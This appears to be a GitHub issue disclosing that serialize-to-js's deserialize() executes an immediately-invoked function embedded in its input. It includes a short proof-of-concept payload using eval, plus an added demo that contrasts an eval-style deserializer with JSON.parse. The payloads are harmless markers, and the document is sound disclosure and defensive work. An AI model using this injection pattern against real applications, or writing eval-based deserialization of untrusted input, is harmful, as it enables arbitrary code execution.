deserialize() can be abused to achieve arbitrary code injection with an IIFE · Issue #1 · commenthol/serialize-to-js

```js
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }";
var serialize = require('serialize-to-js');
serialize.deserialize(payload);
```

I don't know if this is a functionality as you a...
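The behaviour reported above, shown next to a data-only parser, as an added example that is not part of the original issue and is not serialize-to-js's code. `evalStyleDeserialize` is a hypothetical stand-in for any deserializer that evaluates its input as JavaScript, and the payload is a constructed variant of the issue's payload that bumps a counter instead of calling `eval`.

```javascript
'use strict';

// Hypothetical stand-in for an eval-style deserializer (assumption: this is
// NOT the library's source). The input is evaluated as a JavaScript
// expression, so an IIFE inside it runs while the value is being built.
function evalStyleDeserialize(str) {
  return new Function('return (' + str + ')')();
}

// Data-only alternative for untrusted input: JSON has no expression grammar,
// so function calls, IIFEs and template literals are syntax errors, not code.
function dataOnlyDeserialize(str) {
  try {
    return { ok: true, value: JSON.parse(str) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

// Constructed payload in the shape of the issue's, with a harmless marker
// (a counter on globalThis) in place of eval/console.log.
const iifePayload =
  '{e: (function(){ globalThis.__iifeRuns = (globalThis.__iifeRuns || 0) + 1 })() }';
// Constructed benign input that is plain data.
const plainData = '{"e": 1, "list": [true, null, "x"]}';

function demo() {
  globalThis.__iifeRuns = 0;
  evalStyleDeserialize(iifePayload);            // the IIFE executes here
  const ranUnderEval = globalThis.__iifeRuns;
  const rejected = dataOnlyDeserialize(iifePayload);
  const ranUnderJson = globalThis.__iifeRuns - ranUnderEval;
  const accepted = dataOnlyDeserialize(plainData);
  return {
    ranUnderEval,                 // times the payload ran in the eval-style path
    ranUnderJson,                 // times it ran in the JSON path
    payloadRejected: !rejected.ok,
    plainDataAccepted: accepted.ok,
  };
}

console.log(demo());
```

Input that crosses a trust boundary belongs in the data-only path; an eval-style deserializer is only appropriate for strings the application produced itself and stored where others cannot modify them.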